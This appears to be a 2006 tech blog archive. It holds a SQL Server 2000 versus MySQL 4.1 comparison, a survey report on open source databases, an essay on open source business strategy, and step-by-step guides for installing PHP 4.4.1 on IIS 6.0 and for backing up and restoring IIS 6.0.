The TPC has written specifications for many tests: TPC-C, TPC-H, TPC-R and TPC-W, plus some older tests such as TPC-A, TPC-B and TPC-D. The most popular is the TPC-C test (an OLTP test). At the time this article was written, SQL Server 2000 held the second position in the TPC-C results by performance (see Top Ten TPC-C by Performance, Version 5 Results) and the top position by price/performance (see Top Ten TPC-C by Price/Performance, Version 5 Results). MySQL does not participate in TPC-C tests; MySQL AB runs its own benchmarks. These tests are not independent, but if you are interested, see The MySQL Benchmark Suite.

Features comparison

Both SQL Server 2000 and MySQL version 4.1 support the ANSI SQL-92 entry level but not the ANSI SQL-92 intermediate level. In this section, I briefly compare Transact-SQL with the MySQL dialect and show some of the SQL Server 2000 and MySQL version 4.1 limits.

T-SQL vs the MySQL dialect

The dialect of SQL supported by Microsoft SQL Server 2000 is called Transact-SQL (T-SQL); the dialect supported by MySQL version 4.1 is simply the MySQL dialect. Transact-SQL is the more powerful language: for example, it supports stored procedures, triggers and views, none of which exist in MySQL 4.1.

Conclusion

It is not true that SQL Server 2000 is better than MySQL version 4.1, or vice versa. Both products can be used to build stable and efficient systems, and the stability and effectiveness of your applications and databases depend more on the experience of the database developers and administrators than on the database vendor. Still, each product has some advantages over the other.

The SQL Server 2000 advantages:

SQL Server 2000 holds top-tier TPC-C performance results and the top TPC-C price/performance result.
SQL Server 2000 is generally accepted as easier to install, use and manage.
Transact-SQL is a more powerful language than the MySQL dialect.

The MySQL version 4.1 advantages:

MySQL version 4.1 supports many platforms, not only Windows.
MySQL version 4.1 requires less hardware resources.
You can use MySQL version 4.1 without payment under the terms of the GNU General Public License. From the MySQL version 4.1 documentation: "MySQL Server was designed from the start to work with medium size databases (10-100 million rows, or about 100 MB per table) on small computer systems."

Monday, January 09, 2006

MySQL and FirebirdSQL Top Open Source DB List

(originally from internetnews.com)

A report from Evans Data shows that FirebirdSQL and MySQL are the most popular open source databases currently in use.

The findings are part of Evans Data's Database Development Survey of more than 400 developers. According to the survey, 52.9 percent said they are using MySQL and 51.6 percent said they were using FirebirdSQL.

PostgreSQL came in third at 14.8 percent, and Sleepycat's Berkeley DB (4.1 percent), GNU SQL (3.3 percent) and SAP DB (1.2 percent) rounded out the list.
The Firebird name became the subject of heated dispute in the open source community in 2003, when the Mozilla project renamed its next-generation browser, Phoenix, to Firebird. After bowing to pressure from the community and the FirebirdSQL project, Mozilla changed the name to Firefox last year.

According to Evans Data's research, MySQL and FirebirdSQL are each fulfilling different niches.
"Firebird has a very strong position in what we define as edge databases that could be embedded databases -- databases sitting at the periphery of the enterprise," Evans Data analyst Joe McKendrick told internetnews.com. "MySQL had a stronger showing on the enterprise level."

The distant third-place showing by PostgreSQL in the Evans Data survey is likely related to its previous lack of proper Windows support, according to McKendrick. PostgreSQL version 8.0 now includes native Windows support.
"In our survey, 90 percent of our developers work with or deployed to Windows platforms," McKendrick explained. "Windows dominates this space, and a database that doesn't run on Windows or doesn't run effectively in Windows would have a fairly limited reach."

Among the other findings of the Evans Data study is that data restoration capabilities have improved over the past year. In 2003, 41 percent of respondents reported they could restore mission critical data within an hour. That number jumped to 62 percent in 2004.
Security also seems to be a strong point for database administrators in 2004: 89 percent of respondents reported they had no database security breaches.

Software's Top 10 2005 Trends: #2 Open Source

Article originally from Burnam's beat (3/16/2005)

Open Source is one of the most important and perhaps the most controversial trends within the software industry. While some see Open Source as a kind of communal catalyst for innovation and creativity, others see it as a wildly destructive trend that threatens to undermine the economic viability of the entire software industry.

To date, Open Source projects have largely been focused on broad horizontal platforms within infrastructure software. These projects have been so numerous and so successful that many pundits now talk about building applications on top of the all-Open Source LAMP (Linux, Apache, MySQL, PHP/Python/Perl) stack. And that stack continues to grow as Open Source projects migrate to more complex infrastructure platforms, such as application servers (JBoss, Zope, JOnAS, Enhydra). In fact, there are Open Source projects currently underway for just about every major infrastructure software technology you can think of, from content management to BPEL to you name it.

One of the biggest questions facing the software industry in 2005 is whether or not Open Source will “jump the species barrier” and start to become a major factor in the enterprise applications space. A quick look at Sourceforge confirms that to date most Open Source efforts in the applications space have been confined to niche applications in the academic space, but there are now numerous efforts underway, such as SugarCRM, to try and create enterprise-ready Open Source applications. Whether these applications efforts are successful or not is one of the key issues keeping software company executives up at night.

For software executives, Open Source presents three major choices: beat it, join-it, or co-opt it. The conventional wisdom suggests that the way to beat Open Source is to “out-engineer” Open Source by providing a more stable, secure and feature rich product while at the same time “out-servicing” Open Source by providing robust 24/7 support. This strategy appears to be keeping many Global 2000 customers “in the fold” for now, but even at these customers Open Source software is increasingly showing up in non-mission critical areas.

Joining Open Source is an option many companies, especially small infrastructure software companies, increasingly appear to be taking. These companies typically develop their software in-house and then, once finished (or almost finished), declare their software to be "Open Source". The strategy is essentially to use "free Open Source software" as a way to acquire customers who can then be charged services and maintenance fees. This sounds great but has several drawbacks, chief of which is that simply declaring a software product to be Open Source does not automatically create a large community of diverse programmers willing to devote substantial free time to improving it, but it definitely does make the company's IP publicly available. Thus, many of these companies face the prospect of getting little or no development leverage from Open Source in return for giving up control of all of their code.

Attempting to co-opt Open Source is probably the most popular and most complicated approach to dealing with the issue. IBM is the poster child of Open Source co-opting. IBM primarily sees Open Source as a way to commoditize the main revenue sources of its key competitors. IBM's bear hug of Linux was largely part of an (arguably wildly successful) strategy to undermine the value of Solaris and Windows NT and thereby stall their push into the glass house. But IBM's love of Open Source only goes so far: you don't see them pushing JBoss at the expense of WebSphere, or MySQL at the expense of DB2. Indeed, IBM continues to lay out big bucks for "proprietary" software, so its love of Open Source extends only as far as it can co-opt it. Taking IBM's lead, most of the other major software vendors (save Microsoft) now appear to be selectively co-opting Open Source to use as a weapon against their competitors.
For software VCs, Open Source creates a number of tricky investment problems. If you continue to invest in proprietary software, you run the risk of getting "Open Sourced" if the space becomes attractive enough to create either a developer community groundswell or interest from an elephant like IBM. If you invest in Open Source, you run the risk of competing with five other companies selling the same product and turning software margins into services margins.

However, there is some middle ground. For example, companies that offer software as a service are somewhat protected from Open Source pressures as customers are buying the whole service not just the code. Indeed companies that offer software as a service can leverage a lot of Open Source software to lower their own costs. In addition, while Open Source projects may make some headway into a few large horizontal applications, chances are that it will be very difficult for them to penetrate specialized vertical niches because there just aren’t a lot of developers out there that understand the business logic required for those niches, thus making it much harder for an Open Source project to attain critical mass.

Ultimately the biggest issue for VCs is whether or not Open Source has effectively “capped” the home-run potential of software deals by guaranteeing that any new horizontal software platform that achieves critical mass will inevitably face intense competition from a free, Open Source equivalent.

Personally, I'd like to think that the answer to that issue is "no", but I also believe that creating a next-generation "home run" platform company is now a whole lot harder thanks to Open Source.

Sunday, January 08, 2006

How to install php 4.4.1 on iis 6.0

Although this is not as common as installing it on a *nix machine (I personally use FreeBSD and Linux, so I'm not going to play favorites), there are still a great many people out there who, for one reason or another, would like to run PHP scripts on a Windows 2003 box (the company I worked for would not allow us to run anything but Windows machines).

Steps for installing php 4.4.1 on a windows 2003 machine

note: These instructions are for iis 6.0

Step 1: Download php 4.4.1 (get the binary package, not the installer)
Step 2: Extract the .zip file you just downloaded (I usually extract it to the c drive and rename it php, but the name can be anything).
Step 3: Launch the iis (internet information services) manager
Step 4: Click on "web service extensions" on the left, then right-click in the right-hand pane and go to "add a new web service extension". A new window should appear. For "extension name", use ".php". Click the add button on the right and point it to c:\(the php directory from step 2)\sapi\php4isapi.dll. After this is done, check the box that says "set extension status to allowed" and click ok.
Step 5:

a) right-click "web sites" and go to properties.
b) click on the tab "home directory"
c) where it says "execute permissions", it should state: "scripts and executables"
d) click the "configuration..." button
e) click the "add..." button
f) for executable, use the same file from step 4 (php4isapi.dll).
The extension should be .php.

Step 6: copy php.ini to c:\windows and php4ts.dll,php4ts.lib to c:\windows\system32

Testing your new installation:

I usually create a file called "info.php" with the following:

<?php phpinfo(); ?>

If everything has been installed properly, when you browse to "info.php" you should see an information page about php 4.4.1

Saturday, January 07, 2006

Successfully Backing up and Restoring IIS 6.0

There comes a time in every system administrator's life when they must face a harsh reality: your company's webserver has had a major hard drive failure and needs to be running again as quickly as possible, because in the business world, time = money.

After personally going through the above scenario a dozen times, I scoured the Internet to find the best solution for backing up and restoring all of my company's websites. Microsoft provides a few solutions in their knowledge base, but most require you to restore onto the exact system (hardware) where the backup was made.

I came up with a solution that is fairly simple to execute and is hardware independent.

Disclaimer: I have tried the following and it has worked successfully for me, but use it at your own risk. I am not responsible for any damage you may cause from following this procedure.

Steps for backing up (These steps will be done on the original server)

Step 1: Download and Install the iis 6.0 resource kit (link here)
Step 2: We are first going to backup the metabase files for your server. This is a sort of internal registry designed specifically for IIS.
A) Launch the program called "Metabase Explorer" that came with the resource kit
B) Two items can be seen in the left-hand pane: "LM" and "Schema". Both need to be saved. To do this, right-click on each one individually and go to "export to file". To make restoring easier, I prefer to use the exact names of each key: "Lm.mbk" and "Schema.mbk". If you don't use this naming convention, just remember which file is associated with which key.
C) Now the actual websites can be backed up. Nothing special needs to be done here; the entire website directory just needs to be copied to your desired location. Also worth noting: remember the exact path of your websites directory, e.g. "C:\websites" or "C:\wwwroot". You will need this when restoring.

Steps for Restoring (These steps will be done on the new/target server)

Step 1: Copy all website files from the backup to the exact filepath as the original server (from step 2 part c from above)
Step 2: install the iis 6.0 resource kit
Step 3: launch the metabase explorer
Step 4: left-click on "LM" on the left-hand pane and go to metabase->import key. Then point it to the LM key file that has been backed up.
Step 5: Follow step 4 for "schema".
Step 6: This step is important: without it, your websites will be inaccessible. If this step is forgotten, a username/password authentication box will appear whenever someone tries to visit any of your websites.
A) Open up the IIS manager
B) In the left-hand pane, right-click websites and go to properties.
C) Go to the tab that says "directory security" and, under "authentication and access control", click on "edit".
D) The restore process clears these settings, so make sure "enable anonymous access" is checked and a username/password is set. IIS will not allow a blank password, so a password will need to be set for the system's anonymous user account, IUSR_*MACHINE NAME*. This can be done through the administrative user control panel.

You should now have an exact copy of your websites.